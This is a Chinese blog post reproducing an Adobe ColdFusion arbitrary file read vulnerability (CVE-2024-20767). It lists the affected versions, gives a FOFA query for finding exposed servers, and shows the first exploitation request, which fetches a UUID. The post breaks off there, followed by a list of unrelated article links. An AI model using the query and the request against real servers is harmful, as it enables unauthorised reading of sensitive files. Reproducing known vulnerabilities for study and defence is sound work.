Adobe ColdFusion 任意文件读取漏洞复现(CVE-2024-20767)

0x01 产品简介

Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言,将可扩展、改变游戏规则且可靠的产品的愿景变为现实。

0x02 漏洞概述

由于 Adobe ColdFusion 的访问控制不当,未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件,泄露敏感信息。

0x03 影响范围

ColdFusion 2023 <= Update 6

ColdFusion 2021 <= Update 12

0x04 复现环境

FOFA:

app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"

0x05 漏洞复现 

获取uuid

GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close</

最近更新

  1. TCP协议是安全的吗?

    2024-04-01 21:38:01       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-01 21:38:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-01 21:38:01       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-01 21:38:01       20 阅读

热门阅读

  1. echarts初始化时只显示100px的问题

    2024-04-01 21:38:01       12 阅读
  2. Qt 总结

    2024-04-01 21:38:01       14 阅读
  3. 01-XML-03XML Schema

    2024-04-01 21:38:01       15 阅读
  4. DolphinScheduler3.2.1 伪集群部署[二]

    2024-04-01 21:38:01       16 阅读
  5. 【剑指Offer记录】13_机器人的运动范围

    2024-04-01 21:38:01       12 阅读
  6. ARM架构在云计算的发展前景

    2024-04-01 21:38:01       15 阅读